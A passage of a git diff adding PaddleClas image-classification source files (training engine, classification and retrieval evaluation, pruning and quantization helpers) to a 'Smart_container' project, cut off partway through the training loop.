agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. \ No newline at end of file diff --git a/Smart_container/PaddleClas/ppcls/data/utils/get_image_list.py b/Smart_container/PaddleClas/ppcls/data/utils/get_image_list.py new file mode 100644 index 0000000..6f10935 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/utils/get_image_list.py @@ -0,0 +1,49 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import argparse +import base64 +import numpy as np + + +def get_image_list(img_file): + imgs_lists = [] + if img_file is None or not os.path.exists(img_file): + raise Exception("not found any img file in {}".format(img_file)) + + img_end = ['jpg', 'png', 'jpeg', 'JPEG', 'JPG', 'bmp'] + if os.path.isfile(img_file) and img_file.split('.')[-1] in img_end: + imgs_lists.append(img_file) + elif os.path.isdir(img_file): + for single_file in os.listdir(img_file): + if single_file.split('.')[-1] in img_end: + imgs_lists.append(os.path.join(img_file, single_file)) + if len(imgs_lists) == 0: + raise Exception("not found any img file in {}".format(img_file)) + imgs_lists = sorted(imgs_lists) + return imgs_lists + + +def get_image_list_from_label_file(image_path, label_file_path): + imgs_lists = [] + gt_labels = [] + with open(label_file_path, "r") as fin: + lines = fin.readlines() + for line in lines: + image_name, label = line.strip("\n").split() + label = int(label) + imgs_lists.append(os.path.join(image_path, image_name)) + gt_labels.append(int(label)) + return imgs_lists, gt_labels diff --git a/Smart_container/PaddleClas/ppcls/engine/__init__.py b/Smart_container/PaddleClas/ppcls/engine/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Smart_container/PaddleClas/ppcls/engine/engine.py b/Smart_container/PaddleClas/ppcls/engine/engine.py new file mode 100644 index 0000000..d0f2d64 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/engine.py @@ -0,0 +1,429 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import os +import platform +import paddle +import paddle.distributed as dist +from visualdl import LogWriter +from paddle import nn +import numpy as np +import random + +from ppcls.utils.check import check_gpu +from ppcls.utils.misc import AverageMeter +from ppcls.utils import logger +from ppcls.utils.logger import init_logger +from ppcls.utils.config import print_config +from ppcls.data import build_dataloader +from ppcls.arch import build_model, RecModel, DistillationModel +from ppcls.arch import apply_to_static +from ppcls.loss import build_loss +from ppcls.metric import build_metrics +from ppcls.optimizer import build_optimizer +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url +from ppcls.utils.save_load import init_model +from ppcls.utils import save_load + +from ppcls.data.utils.get_image_list import get_image_list +from ppcls.data.postprocess import build_postprocess +from ppcls.data import create_operators +from ppcls.engine.train import train_epoch +from ppcls.engine import evaluation +from ppcls.arch.gears.identity_head import IdentityHead +from ppcls.engine.slim import get_pruner, get_quaner + + +class Engine(object): + def __init__(self, config, mode="train"): + assert mode in ["train", "eval", "infer", "export"] + self.mode = mode + self.config = config + self.eval_mode = self.config["Global"].get("eval_mode", + "classification") + if "Head" in self.config["Arch"]: + self.is_rec = True + else: + self.is_rec = False + + # set seed + seed = self.config["Global"].get("seed", False) + if seed: + assert isinstance(seed, int), "The 'seed' must be a integer!" + paddle.seed(seed) + np.random.seed(seed) + random.seed(seed) + + # init logger + self.output_dir = self.config['Global']['output_dir'] + log_file = os.path.join(self.output_dir, self.config["Arch"]["name"], + f"{mode}.log") + init_logger(name='root', log_file=log_file) + print_config(config) + + # init train_func and eval_func + assert self.eval_mode in ["classification", "retrieval"], logger.error( + "Invalid eval mode: {}".format(self.eval_mode)) + self.train_epoch_func = train_epoch + self.eval_func = getattr(evaluation, self.eval_mode + "_eval") + + self.use_dali = self.config['Global'].get("use_dali", False) + + # for visualdl + self.vdl_writer = None + if self.config['Global']['use_visualdl'] and mode == "train": + vdl_writer_path = os.path.join(self.output_dir, "vdl") + if not os.path.exists(vdl_writer_path): + os.makedirs(vdl_writer_path) + self.vdl_writer = LogWriter(logdir=vdl_writer_path) + + # set device + assert self.config["Global"]["device"] in ["cpu", "gpu", "xpu"] + self.device = paddle.set_device(self.config["Global"]["device"]) + logger.info('train with paddle {} and device {}'.format( + paddle.__version__, self.device)) + + # AMP training + self.amp = True if "AMP" in self.config else False + if self.amp and self.config["AMP"] is not None: + self.scale_loss = self.config["AMP"].get("scale_loss", 1.0) + self.use_dynamic_loss_scaling = self.config["AMP"].get( + "use_dynamic_loss_scaling", False) + else: + self.scale_loss = 1.0 + self.use_dynamic_loss_scaling = False + if self.amp: + AMP_RELATED_FLAGS_SETTING = { + 'FLAGS_cudnn_batchnorm_spatial_persistent': 1, + 'FLAGS_max_inplace_grad_add': 8, + } + paddle.fluid.set_flags(AMP_RELATED_FLAGS_SETTING) + + # build dataloader + if self.mode == 'train': + self.train_dataloader = build_dataloader( + self.config["DataLoader"], "Train", self.device, self.use_dali) + if self.mode in ["train", "eval"]: + if self.eval_mode == "classification": + self.eval_dataloader = build_dataloader( + self.config["DataLoader"], "Eval", self.device, + self.use_dali) + elif self.eval_mode == "retrieval": + self.gallery_query_dataloader = None + if len(self.config["DataLoader"]["Eval"].keys()) == 1: + key = list(self.config["DataLoader"]["Eval"].keys())[0] + self.gallery_query_dataloader = build_dataloader( + self.config["DataLoader"]["Eval"], key, self.device, + self.use_dali) + else: + self.gallery_dataloader = build_dataloader( + self.config["DataLoader"]["Eval"], "Gallery", + self.device, self.use_dali) + self.query_dataloader = build_dataloader( + self.config["DataLoader"]["Eval"], "Query", + self.device, self.use_dali) + + # build loss + if self.mode == "train": + loss_info = self.config["Loss"]["Train"] + self.train_loss_func = build_loss(loss_info) + if self.mode in ["train", "eval"]: + loss_config = self.config.get("Loss", None) + if loss_config is not None: + loss_config = loss_config.get("Eval") + if loss_config is not None: + self.eval_loss_func = build_loss(loss_config) + else: + self.eval_loss_func = None + else: + self.eval_loss_func = None + + # build metric + if self.mode == 'train': + metric_config = self.config.get("Metric") + if metric_config is not None: + metric_config = metric_config.get("Train") + if metric_config is not None: + self.train_metric_func = build_metrics(metric_config) + else: + self.train_metric_func = None + else: + self.train_metric_func = None + + if self.mode in ["train", "eval"]: + metric_config = self.config.get("Metric") + if self.eval_mode == "classification": + if metric_config is not None: + metric_config = metric_config.get("Eval") + if metric_config is not None: + self.eval_metric_func = build_metrics(metric_config) + elif self.eval_mode == "retrieval": + if metric_config is None: + metric_config = [{"name": "Recallk", "topk": (1, 5)}] + else: + metric_config = metric_config["Eval"] + self.eval_metric_func = build_metrics(metric_config) + else: + self.eval_metric_func = None + + # build model + self.model = build_model(self.config["Arch"]) + # set @to_static for benchmark, skip this by default. + apply_to_static(self.config, self.model) + # load_pretrain + if self.config["Global"]["pretrained_model"] is not None: + if self.config["Global"]["pretrained_model"].startswith("http"): + load_dygraph_pretrain_from_url( + self.model, self.config["Global"]["pretrained_model"]) + else: + load_dygraph_pretrain( + self.model, self.config["Global"]["pretrained_model"]) + + # for slim + self.pruner = get_pruner(self.config, self.model) + self.quanter = get_quaner(self.config, self.model) + + # build optimizer + if self.mode == 'train': + self.optimizer, self.lr_sch = build_optimizer( + self.config["Optimizer"], self.config["Global"]["epochs"], + len(self.train_dataloader), [self.model]) + + # for distributed + self.config["Global"][ + "distributed"] = paddle.distributed.get_world_size() != 1 + if self.config["Global"]["distributed"]: + dist.init_parallel_env() + if self.config["Global"]["distributed"]: + self.model = paddle.DataParallel(self.model) + + # build postprocess for infer + if self.mode == 'infer': + self.preprocess_func = create_operators(self.config["Infer"][ + "transforms"]) + self.postprocess_func = build_postprocess(self.config["Infer"][ + "PostProcess"]) + + def train(self): + assert self.mode == "train" + print_batch_step = self.config['Global']['print_batch_step'] + save_interval = self.config["Global"]["save_interval"] + best_metric = { + "metric": 0.0, + "epoch": 0, + } + # key: + # val: metrics list word + self.output_info = dict() + self.time_info = { + "batch_cost": AverageMeter( + "batch_cost", '.5f', postfix=" s,"), + "reader_cost": AverageMeter( + "reader_cost", ".5f", postfix=" s,"), + } + # global iter counter + self.global_step = 0 + + if self.config["Global"]["checkpoints"] is not None: + metric_info = init_model(self.config["Global"], self.model, + self.optimizer) + if metric_info is not None: + best_metric.update(metric_info) + + # for amp training + if self.amp: + self.scaler = paddle.amp.GradScaler( + init_loss_scaling=self.scale_loss, + use_dynamic_loss_scaling=self.use_dynamic_loss_scaling) + + self.max_iter = len(self.train_dataloader) - 1 if platform.system( + ) == "Windows" else len(self.train_dataloader) + for epoch_id in range(best_metric["epoch"] + 1, + self.config["Global"]["epochs"] + 1): + acc = 0.0 + # for one epoch train + self.train_epoch_func(self, epoch_id, print_batch_step) + + if self.use_dali: + self.train_dataloader.reset() + metric_msg = ", ".join([ + "{}: {:.5f}".format(key, self.output_info[key].avg) + for key in self.output_info + ]) + logger.info("[Train][Epoch {}/{}][Avg]{}".format( + epoch_id, self.config["Global"]["epochs"], metric_msg)) + self.output_info.clear() + + # eval model and save model if possible + if self.config["Global"][ + "eval_during_train"] and epoch_id % self.config["Global"][ + "eval_interval"] == 0: + acc = self.eval(epoch_id) + if acc > best_metric["metric"]: + best_metric["metric"] = acc + best_metric["epoch"] = epoch_id + save_load.save_model( + self.model, + self.optimizer, + best_metric, + self.output_dir, + model_name=self.config["Arch"]["name"], + prefix="best_model") + logger.info("[Eval][Epoch {}][best metric: {}]".format( + epoch_id, best_metric["metric"])) + logger.scaler( + name="eval_acc", + value=acc, + step=epoch_id, + writer=self.vdl_writer) + + self.model.train() + + # save model + if epoch_id % save_interval == 0: + save_load.save_model( + self.model, + self.optimizer, {"metric": acc, + "epoch": epoch_id}, + self.output_dir, + model_name=self.config["Arch"]["name"], + prefix="epoch_{}".format(epoch_id)) + # save the latest model + save_load.save_model( + self.model, + self.optimizer, {"metric": acc, + "epoch": epoch_id}, + self.output_dir, + model_name=self.config["Arch"]["name"], + prefix="latest") + + if self.vdl_writer is not None: + self.vdl_writer.close() + + @paddle.no_grad() + def eval(self, epoch_id=0): + assert self.mode in ["train", "eval"] + self.model.eval() + eval_result = self.eval_func(self, epoch_id) + self.model.train() + return eval_result + + @paddle.no_grad() + def infer(self): + assert self.mode == "infer" and self.eval_mode == "classification" + total_trainer = paddle.distributed.get_world_size() + local_rank = paddle.distributed.get_rank() + image_list = get_image_list(self.config["Infer"]["infer_imgs"]) + # data split + image_list = image_list[local_rank::total_trainer] + + batch_size = self.config["Infer"]["batch_size"] + self.model.eval() + batch_data = [] + image_file_list = [] + for idx, image_file in enumerate(image_list): + with open(image_file, 'rb') as f: + x = f.read() + for process in self.preprocess_func: + x = process(x) + batch_data.append(x) + image_file_list.append(image_file) + if len(batch_data) >= batch_size or idx == len(image_list) - 1: + batch_tensor = paddle.to_tensor(batch_data) + out = self.model(batch_tensor) + if isinstance(out, list): + out = out[0] + if isinstance(out, dict): + out = out["output"] + result = self.postprocess_func(out, image_file_list) + print(result) + batch_data.clear() + image_file_list.clear() + + def export(self): + assert self.mode == "export" + use_multilabel = self.config["Global"].get("use_multilabel", False) + model = ExportModel(self.config["Arch"], self.model, use_multilabel) + if self.config["Global"]["pretrained_model"] is not None: + load_dygraph_pretrain(model.base_model, + self.config["Global"]["pretrained_model"]) + + model.eval() + save_path = os.path.join(self.config["Global"]["save_inference_dir"], + "inference") + if self.quanter: + self.quanter.save_quantized_model( + model, + save_path, + input_spec=[ + paddle.static.InputSpec( + shape=[None] + self.config["Global"]["image_shape"], + dtype='float32') + ]) + else: + model = paddle.jit.to_static( + model, + input_spec=[ + paddle.static.InputSpec( + shape=[None] + self.config["Global"]["image_shape"], + dtype='float32') + ]) + paddle.jit.save(model, save_path) + + +class ExportModel(nn.Layer): + """ + ExportModel: add softmax onto the model + """ + + def __init__(self, config, model, use_multilabel): + super().__init__() + self.base_model = model + # we should choose a final model to export + if isinstance(self.base_model, DistillationModel): + self.infer_model_name = config["infer_model_name"] + else: + self.infer_model_name = None + + self.infer_output_key = config.get("infer_output_key", None) + if self.infer_output_key == "features" and isinstance(self.base_model, + RecModel): + self.base_model.head = IdentityHead() + if use_multilabel: + self.out_act = nn.Sigmoid() + else: + if config.get("infer_add_softmax", True): + self.out_act = nn.Softmax(axis=-1) + else: + self.out_act = None + + def eval(self): + self.training = False + for layer in self.sublayers(): + layer.training = False + layer.eval() + + def forward(self, x): + x = self.base_model(x) + if isinstance(x, list): + x = x[0] + if self.infer_model_name is not None: + x = x[self.infer_model_name] + if self.infer_output_key is not None: + x = x[self.infer_output_key] + if self.out_act is not None: + x = self.out_act(x) + return x diff --git a/Smart_container/PaddleClas/ppcls/engine/evaluation/__init__.py b/Smart_container/PaddleClas/ppcls/engine/evaluation/__init__.py new file mode 100644 index 0000000..e0cd778 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/evaluation/__init__.py @@ -0,0 +1,16 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from ppcls.engine.evaluation.classification import classification_eval +from ppcls.engine.evaluation.retrieval import retrieval_eval diff --git a/Smart_container/PaddleClas/ppcls/engine/evaluation/classification.py b/Smart_container/PaddleClas/ppcls/engine/evaluation/classification.py new file mode 100644 index 0000000..d59f2f4 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/evaluation/classification.py @@ -0,0 +1,113 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import time +import platform +import paddle + +from ppcls.utils.misc import AverageMeter +from ppcls.utils import logger + + +def classification_eval(engine, epoch_id=0): + output_info = dict() + time_info = { + "batch_cost": AverageMeter( + "batch_cost", '.5f', postfix=" s,"), + "reader_cost": AverageMeter( + "reader_cost", ".5f", postfix=" s,"), + } + print_batch_step = engine.config["Global"]["print_batch_step"] + + metric_key = None + tic = time.time() + max_iter = len(engine.eval_dataloader) - 1 if platform.system( + ) == "Windows" else len(engine.eval_dataloader) + for iter_id, batch in enumerate(engine.eval_dataloader): + if iter_id >= max_iter: + break + if iter_id == 5: + for key in time_info: + time_info[key].reset() + if engine.use_dali: + batch = [ + paddle.to_tensor(batch[0]['data']), + paddle.to_tensor(batch[0]['label']) + ] + time_info["reader_cost"].update(time.time() - tic) + batch_size = batch[0].shape[0] + batch[0] = paddle.to_tensor(batch[0]).astype("float32") + if not engine.config["Global"].get("use_multilabel", False): + batch[1] = batch[1].reshape([-1, 1]).astype("int64") + # image input + out = engine.model(batch[0]) + # calc loss + if engine.eval_loss_func is not None: + loss_dict = engine.eval_loss_func(out, batch[1]) + for key in loss_dict: + if key not in output_info: + output_info[key] = AverageMeter(key, '7.5f') + output_info[key].update(loss_dict[key].numpy()[0], batch_size) + # calc metric + if engine.eval_metric_func is not None: + metric_dict = engine.eval_metric_func(out, batch[1]) + if paddle.distributed.get_world_size() > 1: + for key in metric_dict: + paddle.distributed.all_reduce( + metric_dict[key], op=paddle.distributed.ReduceOp.SUM) + metric_dict[key] = metric_dict[ + key] / paddle.distributed.get_world_size() + for key in metric_dict: + if metric_key is None: + metric_key = key + if key not in output_info: + output_info[key] = AverageMeter(key, '7.5f') + + output_info[key].update(metric_dict[key].numpy()[0], + batch_size) + + time_info["batch_cost"].update(time.time() - tic) + + if iter_id % print_batch_step == 0: + time_msg = "s, ".join([ + "{}: {:.5f}".format(key, time_info[key].avg) + for key in time_info + ]) + + ips_msg = "ips: {:.5f} images/sec".format( + batch_size / time_info["batch_cost"].avg) + + metric_msg = ", ".join([ + "{}: {:.5f}".format(key, output_info[key].val) + for key in output_info + ]) + logger.info("[Eval][Epoch {}][Iter: {}/{}]{}, {}, {}".format( + epoch_id, iter_id, + len(engine.eval_dataloader), metric_msg, time_msg, ips_msg)) + + tic = time.time() + if engine.use_dali: + engine.eval_dataloader.reset() + metric_msg = ", ".join([ + "{}: {:.5f}".format(key, output_info[key].avg) for key in output_info + ]) + logger.info("[Eval][Epoch {}][Avg]{}".format(epoch_id, metric_msg)) + + # do not try to save best eval.model + if engine.eval_metric_func is None: + return -1 + # return 1st metric in the dict + return output_info[metric_key].avg diff --git a/Smart_container/PaddleClas/ppcls/engine/evaluation/retrieval.py b/Smart_container/PaddleClas/ppcls/engine/evaluation/retrieval.py new file mode 100644 index 0000000..bae7774 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/evaluation/retrieval.py @@ -0,0 +1,169 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import platform +import paddle +from ppcls.utils import logger + + +def retrieval_eval(engine, epoch_id=0): + engine.model.eval() + # step1. build gallery + if engine.gallery_query_dataloader is not None: + gallery_feas, gallery_img_id, gallery_unique_id = cal_feature( + engine, name='gallery_query') + query_feas, query_img_id, query_query_id = gallery_feas, gallery_img_id, gallery_unique_id + else: + gallery_feas, gallery_img_id, gallery_unique_id = cal_feature( + engine, name='gallery') + query_feas, query_img_id, query_query_id = cal_feature( + engine, name='query') + + # step2. do evaluation + sim_block_size = engine.config["Global"].get("sim_block_size", 64) + sections = [sim_block_size] * (len(query_feas) // sim_block_size) + if len(query_feas) % sim_block_size: + sections.append(len(query_feas) % sim_block_size) + fea_blocks = paddle.split(query_feas, num_or_sections=sections) + if query_query_id is not None: + query_id_blocks = paddle.split( + query_query_id, num_or_sections=sections) + image_id_blocks = paddle.split(query_img_id, num_or_sections=sections) + metric_key = None + + if engine.eval_loss_func is None: + metric_dict = {metric_key: 0.} + else: + metric_dict = dict() + for block_idx, block_fea in enumerate(fea_blocks): + similarity_matrix = paddle.matmul( + block_fea, gallery_feas, transpose_y=True) + if query_query_id is not None: + query_id_block = query_id_blocks[block_idx] + query_id_mask = (query_id_block != gallery_unique_id.t()) + + image_id_block = image_id_blocks[block_idx] + image_id_mask = (image_id_block != gallery_img_id.t()) + + keep_mask = paddle.logical_or(query_id_mask, image_id_mask) + similarity_matrix = similarity_matrix * keep_mask.astype( + "float32") + else: + keep_mask = None + + metric_tmp = engine.eval_metric_func(similarity_matrix, + image_id_blocks[block_idx], + gallery_img_id, keep_mask) + + for key in metric_tmp: + if key not in metric_dict: + metric_dict[key] = metric_tmp[key] * block_fea.shape[ + 0] / len(query_feas) + else: + metric_dict[key] += metric_tmp[key] * block_fea.shape[ + 0] / len(query_feas) + + metric_info_list = [] + for key in metric_dict: + if metric_key is None: + metric_key = key + metric_info_list.append("{}: {:.5f}".format(key, metric_dict[key])) + metric_msg = ", ".join(metric_info_list) + logger.info("[Eval][Epoch {}][Avg]{}".format(epoch_id, metric_msg)) + + return metric_dict[metric_key] + + +def cal_feature(engine, name='gallery'): + all_feas = None + all_image_id = None + all_unique_id = None + has_unique_id = False + + if name == 'gallery': + dataloader = engine.gallery_dataloader + elif name == 'query': + dataloader = engine.query_dataloader + elif name == 'gallery_query': + dataloader = engine.gallery_query_dataloader + else: + raise RuntimeError("Only support gallery or query dataset") + + max_iter = len(dataloader) - 1 if platform.system() == "Windows" else len( + dataloader) + for idx, batch in enumerate(dataloader): # load is very time-consuming + if idx >= max_iter: + break + if idx % engine.config["Global"]["print_batch_step"] == 0: + logger.info( + f"{name} feature calculation process: [{idx}/{len(dataloader)}]" + ) + if engine.use_dali: + batch = [ + paddle.to_tensor(batch[0]['data']), + paddle.to_tensor(batch[0]['label']) + ] + batch = [paddle.to_tensor(x) for x in batch] + batch[1] = batch[1].reshape([-1, 1]).astype("int64") + if len(batch) == 3: + has_unique_id = True + batch[2] = batch[2].reshape([-1, 1]).astype("int64") + out = engine.model(batch[0], batch[1]) + batch_feas = out["features"] + + # do norm + if engine.config["Global"].get("feature_normalize", True): + feas_norm = paddle.sqrt( + paddle.sum(paddle.square(batch_feas), axis=1, keepdim=True)) + batch_feas = paddle.divide(batch_feas, feas_norm) + + # do binarize + if engine.config["Global"].get("feature_binarize") == "round": + batch_feas = paddle.round(batch_feas).astype("float32") * 2.0 - 1.0 + + if engine.config["Global"].get("feature_binarize") == "sign": + batch_feas = paddle.sign(batch_feas).astype("float32") + + if all_feas is None: + all_feas = batch_feas + if has_unique_id: + all_unique_id = batch[2] + all_image_id = batch[1] + else: + all_feas = paddle.concat([all_feas, batch_feas]) + all_image_id = paddle.concat([all_image_id, batch[1]]) + if has_unique_id: + all_unique_id = paddle.concat([all_unique_id, batch[2]]) + + if engine.use_dali: + dataloader.reset() + + if paddle.distributed.get_world_size() > 1: + feat_list = [] + img_id_list = [] + unique_id_list = [] + paddle.distributed.all_gather(feat_list, all_feas) + paddle.distributed.all_gather(img_id_list, all_image_id) + all_feas = paddle.concat(feat_list, axis=0) + all_image_id = paddle.concat(img_id_list, axis=0) + if has_unique_id: + paddle.distributed.all_gather(unique_id_list, all_unique_id) + all_unique_id = paddle.concat(unique_id_list, axis=0) + + logger.info("Build {} done, all feat shape: {}, begin to eval..".format( + name, all_feas.shape)) + return all_feas, all_image_id, all_unique_id diff --git a/Smart_container/PaddleClas/ppcls/engine/slim/__init__.py b/Smart_container/PaddleClas/ppcls/engine/slim/__init__.py new file mode 100644 index 0000000..bdf067a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/slim/__init__.py @@ -0,0 +1,16 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from ppcls.engine.slim.prune import get_pruner +from ppcls.engine.slim.quant import get_quaner diff --git a/Smart_container/PaddleClas/ppcls/engine/slim/prune.py b/Smart_container/PaddleClas/ppcls/engine/slim/prune.py new file mode 100644 index 0000000..fc28452 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/slim/prune.py @@ -0,0 +1,66 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import, division, print_function +import paddle +from ppcls.utils import logger + + +def get_pruner(config, model): + if config.get("Slim", False) and config["Slim"].get("prune", False): + import paddleslim + prune_method_name = config["Slim"]["prune"]["name"].lower() + assert prune_method_name in [ + "fpgm", "l1_norm" + ], "The prune methods only support 'fpgm' and 'l1_norm'" + if prune_method_name == "fpgm": + pruner = paddleslim.dygraph.FPGMFilterPruner( + model, [1] + config["Global"]["image_shape"]) + else: + pruner = paddleslim.dygraph.L1NormFilterPruner( + model, [1] + config["Global"]["image_shape"]) + + # prune model + _prune_model(pruner, config, model) + else: + pruner = None + + return pruner + + +def _prune_model(pruner, config, model): + from paddleslim.analysis import dygraph_flops as flops + logger.info("FLOPs before pruning: {}GFLOPs".format( + flops(model, [1] + config["Global"]["image_shape"]) / 1e9)) + model.eval() + + params = [] + for sublayer in model.sublayers(): + for param in sublayer.parameters(include_sublayers=False): + if isinstance(sublayer, paddle.nn.Conv2D): + params.append(param.name) + ratios = {} + for param in params: + ratios[param] = config["Slim"]["prune"]["pruned_ratio"] + plan = pruner.prune_vars(ratios, [0]) + + logger.info("FLOPs after pruning: {}GFLOPs; pruned ratio: {}".format( + flops(model, [1] + config["Global"]["image_shape"]) / 1e9, + plan.pruned_flops)) + + for param in model.parameters(): + if "conv2d" in param.name: + logger.info("{}\t{}".format(param.name, param.shape)) + + model.train() diff --git a/Smart_container/PaddleClas/ppcls/engine/slim/quant.py b/Smart_container/PaddleClas/ppcls/engine/slim/quant.py new file mode 100644 index 0000000..a6ef8a5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/slim/quant.py @@ -0,0 +1,55 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import, division, print_function +import paddle +from ppcls.utils import logger + +QUANT_CONFIG = { + # weight preprocess type, default is None and no preprocessing is performed. + 'weight_preprocess_type': None, + # activation preprocess type, default is None and no preprocessing is performed. + 'activation_preprocess_type': None, + # weight quantize type, default is 'channel_wise_abs_max' + 'weight_quantize_type': 'channel_wise_abs_max', + # activation quantize type, default is 'moving_average_abs_max' + 'activation_quantize_type': 'moving_average_abs_max', + # weight quantize bit num, default is 8 + 'weight_bits': 8, + # activation quantize bit num, default is 8 + 'activation_bits': 8, + # data type after quantization, such as 'uint8', 'int8', etc. default is 'int8' + 'dtype': 'int8', + # window size for 'range_abs_max' quantization. default is 10000 + 'window_size': 10000, + # The decay coefficient of moving average, default is 0.9 + 'moving_rate': 0.9, + # for dygraph quantization, layers of type in quantizable_layer_type will be quantized + 'quantizable_layer_type': ['Conv2D', 'Linear'], +} + + +def get_quaner(config, model): + if config.get("Slim", False) and config["Slim"].get("quant", False): + from paddleslim.dygraph.quant import QAT + assert config["Slim"]["quant"]["name"].lower( + ) == 'pact', 'Only PACT quantization method is supported now' + QUANT_CONFIG["activation_preprocess_type"] = "PACT" + quanter = QAT(config=QUANT_CONFIG) + quanter.quantize(model) + logger.info("QAT model summary:") + paddle.summary(model, (1, 3, 224, 224)) + else: + quanter = None + return quanter diff --git a/Smart_container/PaddleClas/ppcls/engine/train/__init__.py b/Smart_container/PaddleClas/ppcls/engine/train/__init__.py new file mode 100644 index 0000000..800d3a4 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/train/__init__.py @@ -0,0 +1,14 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from ppcls.engine.train.train import train_epoch diff --git a/Smart_container/PaddleClas/ppcls/engine/train/train.py b/Smart_container/PaddleClas/ppcls/engine/train/train.py new file mode 100644 index 0000000..347ff31 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/train/train.py @@ -0,0 +1,83 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from __future__ import absolute_import, division, print_function + +import time +import paddle +from ppcls.engine.train.utils import update_loss, update_metric, log_info + + +def train_epoch(engine, epoch_id, print_batch_step): + tic = time.time() + for iter_id, batch in enumerate(engine.train_dataloader): + if iter_id >= engine.max_iter: + break + if iter_id == 5: + for key in engine.time_info: + engine.time_info[key].reset() + 